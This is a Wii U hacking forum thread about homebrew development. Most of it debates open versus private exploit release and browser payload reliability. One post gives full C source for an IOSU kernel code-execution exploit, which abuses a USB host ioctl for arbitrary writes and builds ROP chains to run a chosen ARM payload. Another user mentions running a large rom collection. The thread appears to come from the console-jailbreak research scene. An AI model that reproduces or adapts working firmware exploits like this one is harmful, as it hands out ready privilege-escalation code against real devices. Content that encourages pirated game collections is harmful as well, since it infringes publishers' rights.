Hacking Wii U Hacking & Homebrew Discussion

punderino

> That wait can actually be moved to the browser payload! Once I get a chance I might just look into integrating my stuff so I can PR it.
> BTW, the new public iosu kernel code exec doesn't really mean much regarding our release plans/timeframe. Everything will still drop when it's done. I wouldn't personally spend too many hundreds of hours working on it tho since the work is already done! Of course it's not fair to say that while our stuff is still private and in development so... do whatever you want tbh.
Can't you put the source up public so that others can work on it and speed up the process? People are gonna work on this other stuff regardless, it'd be a big help. :P

shinyquagsire23

> Can't you put the source up public so that others can work on it and speed up the process? People are gonna work on this other stuff regardless, it'd be a big help. :P
This would be under the assumption that things don't get forked by 20 different people with slightly different tweaks in each branch that never make it back to the original project. Memchunkhax2 was a mess with 3DS because there were at least 3 different tools trying to do the same thing rather than one unified effort. Sometimes a private unified effort can be more efficient and effective than a public maybe-unified maybe-not project. Some might argue that forking is better because it gives people more choice, but most of the time it just ends up being confusing and pointless because people like to randomly strip features in the name of m i n i m a l i s m

punderino

> This would be under the assumption that things don't get forked by 20 different people with slightly different tweaks in each branch that never make it back to the original project. Memchunkhax2 was a mess with 3DS because there were at least 3 different tools trying to do the same thing rather than one unified effort. Sometimes a private unified effort can be more efficient and effective than a public maybe-unified maybe-not project. Some might argue that forking is better because it gives people more choice, but most of the time it just ends up being confusing and pointless because people like to randomly strip features in the name of m i n i m a l i s m
Yeah, I remember that lol. Have you let others who you know are knowledgeable on this stuff work with you? Or is it the same small team as before?

NWPlayer123

Yeah, 5.5.1 has always been 100% for me, but it depends on the Wii U, and I'm not sure what factors; it depends on the server and internet, I guess. Some use mine (nwplayer123.github.io/WiiU/) just fine, others have to use a different site to deliver. Basically it has to get the entire MP4 payload downloaded before it starts executing, so just try a different site or host yourself, cause that'll have the lowest delay.

WulfyStylez

> Can't you put the source up public so that others can work on it and speed up the process? People are gonna work on this other stuff regardless, it'd be a big help. :P
I'm talking about a separate early project here. We were at this point in around april of this year I think, so a serious amount of work beyond this has already been put in.

iAqua

Here's IOSU kernel code execution (using the IOS_CreateThread vector which is described on wiiubrew):

Code:
//Main.c
#include <string.h>
#include <stdarg.h>
#include <stdlib.h>
#include <malloc.h>
#include <unistd.h>
#include "dynamic_libs/os_functions.h"
#include "dynamic_libs/fs_functions.h"
#include "dynamic_libs/gx2_functions.h"
#include "dynamic_libs/sys_functions.h"
#include "dynamic_libs/vpad_functions.h"
#include "dynamic_libs/padscore_functions.h"
#include "dynamic_libs/socket_functions.h"
#include "dynamic_libs/ax_functions.h"
#include "fs/fs_utils.h"
#include "fs/sd_fat_devoptab.h"
#include "system/memory.h"
#include "utils/logger.h"
#include "utils/utils.h"
#include "common/common.h"
#include "main.h"

int dev_uhs_0_handle;

/* Forward declarations: both helpers are defined below Menu_Main, which calls them */
void uhs_exploit_init(void);
int uhs_write32(int arm_addr, int val);

/* YOUR ARM CODE HERE (starts at 0x08122500) */
int execute_me[] = {
    0xE3A00000,       // MOV R0, #0
    0xE12FFF1E,       // BX LR
};

#define CHAIN_START         0x1016AD40
#define SHUTDOWN         0x1012EE4C
#define SIMPLE_RETURN      0x101014E4
#define SOURCE            (0x120000)
#define IOS_CREATETHREAD   0x1012EABC

/* ROP CHAIN STARTS HERE (0x1015BD78) */
int final_chain[] = {
    0x101236f3,        // 0x00     POP {R1-R7,PC}
    0x0,               // 0x04     arg
    0x0812974C,        // 0x08     stackptr     CMP R3, #1; STREQ R1, [R12]; BX LR
    0x68,              // 0x0C     stacksize
    0x10101638,        // 0x10
    0x0,               // 0x14
    0x0,               // 0x18
    0x0,               // 0x1C
    0x1010388C,        // 0x20     CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
    0x0,               // 0x24
    0x0,               // 0x28
    0x1012CFEC,        // 0x2C     MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0x30
    0x0,               // 0x34
    IOS_CREATETHREAD,  // 0x38
    0x1,               // 0x3C
    0x2,               // 0x40
    0x10123a9f,        // 0x44     POP {R0,R1,R4,PC}
    0x0812A314,        // 0x48     address: the beginning of syscall_0x1a (IOS_GetUpTime64)
    0xEE030F10,        // 0x4C     value: MCR    P15, #0, R0, C3, C0, #0 (set dacr to R0)
    0x0,               // 0x50
    0x10123a8b,        // 0x54     POP {R3,R4,PC}
    0x1,               // 0x58     R3 must be 1 for the arbitrary write
    0x0,               // 0x5C
    0x1010CD18,        // 0x60     MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0x64
    0x0,               // 0x68
    0x1012EE64,        // 0x6C     set_panic_behavior (arbitrary write)
    0x0,               // 0x70
    0x0,               // 0x74
    0x10123a9f,        // 0x78     POP {R0,R1,R4,PC}
    0x0812A314 + 0x4,  // 0x7C     address: the beginning of syscall_0x1a (IOS_GetUpTime64)
    0xE1A0D001,        // 0x80     value: MOV SP, R1
    0x0,               // 0x84
    0x10123a8b,        // 0x88     POP {R3,R4,PC}
    0x1,               // 0x8C     R3 must be 1 for the arbitrary write
    0x0,               // 0x90
    0x1010CD18,        // 0x94     MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0x98
    0x0,               // 0x9C
    0x1012EE64,        // 0xA0     set_panic_behavior (arbitrary write)
    0x0,               // 0xA4
    0x0,               // 0xA8
    0x10123a9f,        // 0xAC     POP {R0,R1,R4,PC}
    0x0812A314 + 0x8,  // 0xB0     address: the beginning of syscall_0x1a (IOS_GetUpTime64)
    0xE8BD800F,        // 0xB4     value: LDMFD SP!, {R0-R3,PC}
    0x0,               // 0xB8
    0x10123a8b,        // 0xBC     POP {R3,R4,PC}
    0x1,               // 0xC0     R3 must be 1 for the arbitrary write
    0x0,               // 0xC4
    0x1010CD18,        // 0xC8     MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0xCC
    0x0,               // 0xD0
    0x1012EE64,        // 0xD4     set_panic_behavior (arbitrary write)
    0x0,               // 0xD8
    0x0,               // 0xDC
    0x10123a9f,        // 0xE0     POP {R0,R1,R4,PC}
    0xFFFFFFFF,        // 0xE4     enable read/write everywhere
    0x1015BD78 + 0xF4, // 0xE8     location of privileged stack
    0x0,               // 0xEC
    0x1012EB8C,        // 0xF0     IOS_GetUpTime64 (privileged stack pivot) (ends in LDMFD SP!, {R0-R3,PC})
    0x08122500,        // 0xF4     destination
    0x00140000,        // 0xF8     source
    sizeof(execute_me),// 0xFC     length
    0x0,               // 0x100
    0x08131AE4,        // 0x104    BL KERNEL_MEMCPY; MOV R0, R4; ADD SP, SP, #8; LDMFD SP!, {R4-R8,PC}
    0x0,               // 0x108
    0x0,               // 0x10C
    0xFFFFDC48,        // 0x110    Will be the LR: shutdown syscall
    0x0,               // 0x114
    0x0,               // 0x118
    0x0,               // 0x11C
    0x0,               // 0x120
    0x0812A124,        // 0x124    MOV LR, R4; MOV R0, LR; LDMFD SP!, {R4,PC}
    0x0,               // 0x128 
    0x08122500,        // 0x12C    Jump to code!
};

int second_chain[] = {
    0x10123a9f, // 0x00         POP {R0,R1,R4,PC}
    CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000,     // 0x04         destination
    0x0,        // 0x08     
    0x0,        // 0x0C     
    0x101063db, // 0x10         POP {R1,R2,R5,PC}
    0x00130000, // 0x14         source
    sizeof(final_chain),          // 0x18         length
    0x0,        // 0x1C     
    0x10106D4C, // 0x20         BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
    0x0,        // 0x24     
    0x0,        // 0x28     
    0x101236f3, // 0x2C         POP {R1-R7,PC}
    0x0,        // 0x30         arg
    0x101001DC, // 0x34         stackptr
    0x68,       // 0x38         stacksize
    0x10101634, // 0x3C         proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC}
    0x0,        // 0x40
    0x0,        // 0x44
    0x0,        // 0x48
    0x1010388C, // 0x4C         CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
    0x0,        // 0x50
    0x0,        // 0x54
    0x1012CFEC, // 0x58         MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,        // 0x5C
    0x0,        // 0x60
    IOS_CREATETHREAD, // 0x64
    0x1,        // 0x68         priority
    0x2,        // 0x6C         flags
    0x0,        // 0x70
    0x0,        // 0x74
    0x101063db, // 0x78         POP {R1,R2,R5,PC}
    0x0,        // 0x7C     
    -(0x240 + 0xF000), // 0x80  stack offset
    0x0,        // 0x84     
    0x1011D424, // 0x88         LDMFD SP!, {R4-R11,PC}
    0x0,        // 0x8C     
    0x0,        // 0x90     
    0x0,        // 0x94     
    0x0,        // 0x98     
    0x0,        // 0x9C     
    0x0,        // 0xA0     
    0x0,        // 0xA4     
    0x4,        // 0xA8         R11 must equal 4 in order to pivot the stack
    0x1012EA68, // 0xAC         stack pivot
};

int Menu_Main(void) {
    //!---------INIT---------
    InitOSFunctionPointers();                  //! Init coreinit function addresses
    dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0);   //! Open /dev/uhs/0 IOS node
    uhs_exploit_init();                        //! Init variables for the exploit

    //!------ROP CHAIN-------
    uhs_write32(CHAIN_START + 0x14, CHAIN_START + 0x14 + 0x4 + 0x20);
    uhs_write32(CHAIN_START + 0x10, 0x1011814C);
    uhs_write32(CHAIN_START + 0xC, SOURCE);

    uhs_write32(CHAIN_START, 0x1012392b); // pop {R4-R6,PC}

    //!--------DEINIT--------
    IOS_Close(dev_uhs_0_handle);               //! Close /dev/uhs/0 IOS node
    return EXIT_SUCCESS;                       //! Exit from HBL
}

//!------Variables used in exploit------
int *pretend_root_hub = (int*)0xF5003ABC;
int *ayylmao = (int*)0xF4500000;
//!-------------------------------------

void uhs_exploit_init(void) {
    ayylmao[5] = 1;
    ayylmao[8] = 0x500000;

    memcpy((char*)(0xF4120000), second_chain, sizeof(second_chain));
    memcpy((char*)(0xF4130000), final_chain, sizeof(final_chain));
    memcpy((char*)(0xF4140000), execute_me, sizeof(execute_me));

    pretend_root_hub[33] = 0x500000;
    pretend_root_hub[78] = 0;

    DCFlushRange(pretend_root_hub + 33, 200);      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange(pretend_root_hub + 33, 200);   //! |for "pretend_root_hub"

    DCFlushRange((void*)0xF4120000, sizeof(second_chain));      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange((void*)0xF4120000, sizeof(second_chain));   //! |for second chain inside MEM1
    DCFlushRange((void*)0xF4130000, sizeof(final_chain));      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange((void*)0xF4130000, sizeof(final_chain));   //! |for final chain inside MEM1
    DCFlushRange((void*)0xF4140000, sizeof(execute_me));      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange((void*)0xF4140000, sizeof(execute_me));   //! |for execute_me (the ARM payload) inside MEM1
}

int uhs_write32(int arm_addr, int val) {
    ayylmao[520] = arm_addr - 24;                  //!  The address to be overwritten, minus 24 bytes
    DCFlushRange(ayylmao, 521 * 4);                //! |Make CPU fetch new data (with updated address)
    DCInvalidateRange(ayylmao, 521 * 4);           //! |for "ayylmao"
    OSSleepTicks(0x200000);                        //!  Improves stability
    int request_buffer[] = { -(0xBEA2C), val };      //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1
    int output_buffer[32];
    return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));
}

Put your code into execute_me and it'll execute. You have about 0x5D0 bytes of space. The above code will simply shut your console down as a demonstration.
Here it is... IOSU's dead.

wiiman.au

Just an idea (not sure if it would work though). OK, so we currently use a web hack from our PCs to exploit the Wii U. Is it possible to host our game collection on our PC and run them from the PC via ethernet rather than using an SD card? I know you can buy a USB ethernet adaptor for the Wii U to improve speed; could this idea work?

Deleted User

> Just an idea (not sure if it would work though). OK, so we currently use a web hack from our PCs to exploit the Wii U. Is it possible to host our game collection on our PC and run them from the PC via ethernet rather than using an SD card? I know you can buy a USB ethernet adaptor for the Wii U to improve speed; could this idea work?
As far as I know, normal retail Wii Us don't have ethernet ports; I just checked on my own Wii U and it doesn't have one. Only kiosk units and dev units have it, I think...

moops44

> Neither had I until I came across it on Google and thought, what if? It could save a lot of time and effort waiting for IOSU if we could stream the game across ethernet from a PC. Wild thought, but it could work?
afaik they tested the speed between sdcard and ethernet, and there was no real difference :wacko:

wiiman.au

> afaik they tested the speed between sdcard and Ethernet, and there was no real difference :wacko:

I'm not referring to speed, although I thought via Ethernet would be a bit quicker than SD, but anyway, moving on from that, what I am referring to is being able to run our collections from a PC rather than forking out big $$$ for an SD card. My collection is already over 250 gigs worth of roms, so with that you can understand what I mean. Now I'm no server expert, but if you can run an exploit from your PC, why is it not possible to execute roms from there as well?

wiiman.au

> This would be under the assumption that things don't get forked by 20 different people with slightly different tweaks in each branch that never make it back to the original project. Memchunkhax2 was a mess with 3DS because there were at least 3 different tools trying to do the same thing rather than one unified effort. Sometimes a private unified effort can be more efficient and effective than a public maybe-unified maybe-not project. Some might argue that forking is better because it gives people more choice, but most of the time it just ends up being confusing and pointless because people like to randomly strip features in the name of m i n i m a l i s m

I tend to agree to disagree on that. Open source would improve the code and get more people involved in development; a perfect example is the emulation scene, just look at the likes of RetroArch, PCSX2, Dolphin etc. If it was closed source the code wouldn't get improved and games wouldn't run etc. Open source is the way forward. Understandably your crew wants the credit for the hack and I get that, but at least let others get involved in the development to make this happen.